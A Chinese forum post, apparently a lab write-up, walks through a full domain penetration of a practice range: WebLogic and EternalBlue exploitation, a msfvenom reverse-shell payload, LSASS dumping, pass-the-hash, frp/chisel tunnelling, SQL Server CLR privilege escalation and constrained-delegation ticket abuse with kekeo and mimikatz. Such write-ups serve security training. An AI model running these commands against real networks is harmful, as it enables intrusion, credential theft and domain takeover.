电脑疯子技术论坛|电脑极客社区

 找回密码
 注册

QQ登录

只需一步,快速开始

[WEB前端技术] 记一次二层内网域渗透实战

[复制链接]
zhaorong 发表于 2021-11-22 16:58:04 | 显示全部楼层 |阅读模式
本文记录了一次针对具有二层内网的域环境进行渗透测试的过程,文中涉及了内网域渗透的基本方法 思路和
技巧交替使用了msf、CobaltStrike、frp、chisel、SharpSQLTools等工具 最后通过约束委派拿下了域控其
间运用了很多小工具 文章较长。下面开始此次渗透长途之旅。

100.JPG

web服务器

先来波端口扫描:

99.JPG

这里介绍个有意思的小工具,https://github.com/mubix/IOXIDResolver

98.JPG

直接发现了内网的ip,这里需要提前说明一点 由于靶场搭建的问题 weblogic只在10.10.20.12这个ip上
才能解析,所以需要调整下ip设置。等做完weblogic后我们在改回192段。

97.JPG

看到了weblogic的版本,查找下exp 顺手先来一波smb信息收集。

smb信息收集

smbmap -H 10.10.20.12
smbclient -N -L //10.10.20.12
enum4linux -a 10.10.20.12

96.JPG

rpcclient -U '' 10.10.20.12

smbclient -U '' -L \\10.10.20.12

95.JPG

weblogic漏洞利用

知道了weblogic的具体版本 可以直接去查询漏洞 也可以用工具自动扫描下;

94.JPG

这里直接用CVE的漏洞来打一波;

93.JPG

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.20.4
LPORT=1234 -f psh-cmd > exploit.ps1

92.JPG

# use exploit/multi/handler
# set payload windows/x64/meterpreter/reverse_tcp
# set lhost 10.10.20.4
# set lport 1234
# exploit

91.JPG

90.JPG

89.JPG

迁移下进程,开始抓密码;

88.JPG

爆破一波 原来是个弱口令;

87.JPG

接下来换成CS更方便;

./teamserver 192.168.223.138  123456

86.JPG

java -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -Xm
x1024M -javaagent:hook.jar -jar cobaltstrike.jar

85.JPG

信息收集一波;

83.JPG

weblogic数据解密

在介绍下用注册表抓取hash的方法;

82.JPG

抓取成功后拖回本地;

81.JPG

在本地解密;

80.JPG

这里有了hash之后 尝试下不用msf和cs来渗透;
evil-winrm -u administrator -H ccef208c6485269c20db2
cad21734fe7 -i 192.168.223.165

79.JPG

get-process -name lsass
rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 500
C:\temp\lsass.dmp full
rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 500
C:\windows\temp\lsass.dmp full
ls C:\windows\temp\lsass.dmp
download C:\windows\temp\lsass.dmp

78.JPG

lsass.dmp重命名为weblogic.dmp

pypykatz lsa minidump weblogic.dmp -o weblogic.txt

77.JPG

并没有发现预想中存在的密码,所以下面换个其他的方法;

76.JPG

69.JPG

68.JPG

解密工具可以解密了;

67.JPG

至此,web服务器算是搞定了 下面开始个人主机的渗透。

个人主机

永恒之蓝利用


进入内网,个人主机已经无法直接出网了,需要搭建代理。

frp代理

服务端

[common]
bind_addr =192.168.223.138
bind_port =7000
token = Xa3BJf2l5enmN6Z7A8mv
[socks5]
type = tcp
remote_port =7777
plugin = socks5

客户端

[common]
server_addr = 192.168.223.138
server_port = 7000
token = Xa3BJf2l5enmN6Z7A8mv
[plugin_socks]
type = tcp
remote_port = 7777
plugin = socks5

proxychains nmap -v -Pn -T3 -sV -n -sT --open -p 22,1222,2222,22345,23,21,445,135,139,598
5,2121,3389,13389,6379,4505,1433,3306,5000,5236,5900,5432,1521,1099,53,995,8140,993,46
5,878,7001,389,902,1194,1080,88 10.10.20.7

66.JPG

这里还可以尝试下用chisel;

./chisel server -p 8000 --reverse

./chisel client 192.168.223.138:8000 R:8100:socks

65.JPG

64.JPG

在kali里设置好代理配置;

63.JPG

proxychains nmap --script smb-vuln* -p 445 -sT -Pn 10.10.20.7 -vvv

62.JPG

很明显了 永恒之蓝;这里还是用frp代理,通过msf来方便点。

msf6 > setg Proxies socks5:192.168.223.138:7777
msf6 > setg ReverseAllowProxy true
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > set payload windows/x64/meterpreter/bind_tcp
msf6 > set rhost 10.10.20.7
msf6 > run

61.JPG

成功拿下个人主机 照例先抓下密码;

60.JPG

这里在介绍另一种抓取密码的思路,在目标机抓取后拿回本地来解密分析在
某些场合下会有奇效;

19.JPG

取回本地,minidump方式解开

18.JPG

查看结果;

17.JPG

为了后续方便,我们可以用CobaltStrike来继续,虽然msf和CS会话可以互通 但我还是习惯直接种
马后使用。这里web服务器已经提前在CS上反弹好了。精华在于CS的中转功能。
因为此 Win7 不出网 随后只能通过 CobaltStrike 设置中转:
先创建中转监听器:

16.JPG

15.JPG

生成木马:

14.JPG

利用msf上传并运行木马后机器上线;

13.JPG

信息收集一波;

12.JPG

11.JPG

可以看到个人主机后面还有2台机器,分别是域控服务器和数据库服务器在进行下一步渗
透之前 。先需要把二级代理搭建好。

二级代理搭建

先看看frp如何搭建二级代理;

kali上配置服务端;

10.JPG

web服务器上配置;(一个服务端,一个客户端)

9.JPG

个人主机上配置客户端;

8.JPG

扫描测试下;

7.JPG

在用chisel搭建一个2级代理;

kali上配置服务端;

6.JPG

web服务器上配置客户端和服务端;

5.JPG

个人主机上配置客户端;

4.JPG

扫描测试下;

proxychains nmap -sC -sV -F -sT -Pn 10.10.10.18 -vvv

3.JPG

数据库服务器

这里先借助bloodhound来分析下域环境以确定下一步的渗透思路 具体的安装及使用这里
就不赘述了我之前的文章有过详细介绍。
到达域管理员的最短路径;

2.JPG

用户:redteam.red/sqlserver 允许委托OWA的cifs服务(DC控制器)

1.JPG

至此有了后续基本的渗透思路,就是通过委派攻击拿下域控,下面开始逐步实施;

根据之前端口扫描的结果,做下信息收集;

1000000.JPG

999999.JPG

结合我们已经取得的个人主机控制权,首先当前进程是没有域管的 所以暂且放弃令牌窃取:

99998.JPG

这里用到了约束委派攻击的知识,简单来说,在Windows系统中,普通用户的属性中没有委派Delegation这个选
项卡 只有服务账号、主机账号才有。服务账号(Service Account),域内用户的一种类型 服务器运行服务时所
用的账号,将服务运行起来并加入域。例如MS SQL Server在安装时,会在域内自动注册服务账号SqlServiceAc
count,这类账号不能用于交互式登录。(更具体知识要自己补一下)

由于我们已经拿到了一个域用户的账户密码,尝试查找约束委派的用户:
AdFind.exe -h 10.10.10.8 -u saul -up admin!@#45 -b "DC=redteam,DC=red
" -f "(&(samAccountType=805306368)(msds-allowedtodelegateto=*))" cn di
stinguishedName msds-allowedtodelegateto

999997.JPG

sqlserver 的用户是被设置了约束委派,但还需要密码;之前知道1433是开放的 爆破一波试试;

9996.JPG

这样就可以执行xp_cmdshell 命令了;

9995.JPG

发现权限很小只是一个普通服务权限 下面开始提权;
使用 SharpSQLTools 开启目标 clr:(要用Proxifier挂上代理,就不截图了)
SharpSQLTools.exe 10.10.10.18 sa sa master install_clr whoami

9994.JPG

然后启用并调用命令:

SharpSQLTools.exe 10.10.10.18 sa sa master enable_clr

SharpSQLTools.exe 10.10.10.18 sa sa master clr_efspotato whoami

9993.JPG

9992.JPG

提取成功。

下面用msf来进行文件上传;

9991.JPG

9990.JPG

上传一个CS的木马;

1999.JPG

然后在用高权限来运行cs木马;

1998.JPG

成功上线;

1997.JPG

抓取下密码;

1996.JPG

至此 数据库服务器渗透结束 下面开始对域控的渗透。

域控

经过前面的分析 这里就是纯粹的利用约束委派拿下域控。
1、利用 kekeo 请求该用户的 TGT:TGT_sqlserver@REDTEAM.
RED_krbtgt~redteam.red@REDTEAM.RED.kirbi
kekeo.exe "tgt::ask /user:sqlserver /domain:redteam.red /pass
word:Server12345 /ticket:administrator.kirbi"

2、然后使用这张 TGT (TGT_sqlserver@REDTEAM.RED_krbtgt~redteam.red@RED
TEAM.RED.kirbi) 获取域机器的 ST:TGS_Administrator@redteam.red@REDTEA
M.RED_cifs~owa.redteam.red@REDTEAM.RED.kirbi
kekeo.exe "tgs::s4u /tgt:TGT_sqlserver@REDTEAM.RED_krbtgt~redteam.red@RED
TEAM.RED.kirbi /user:Administrator@redteam.red /service:cifs/owa.redteam.red"

3、使用 mimikatz 将 ST2 导入当前会话即可 运行 mimikatz 进行 ptt:
mimikatz kerberos::ptt TGS_Administrator@redteam.red@REDTEAM.RE
D_cifs~owa.redteam.red@REDTEAM.RED.kirbi

1995.JPG

成功拿到域控权限;

266.JPG
您需要登录后才可以回帖 登录 | 注册

本版积分规则

手机版|小黑屋|VIP|电脑疯子技术论坛 ( Computer madman team )

GMT+8, 2025-1-23 10:26

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.

快速回复 返回顶部 返回列表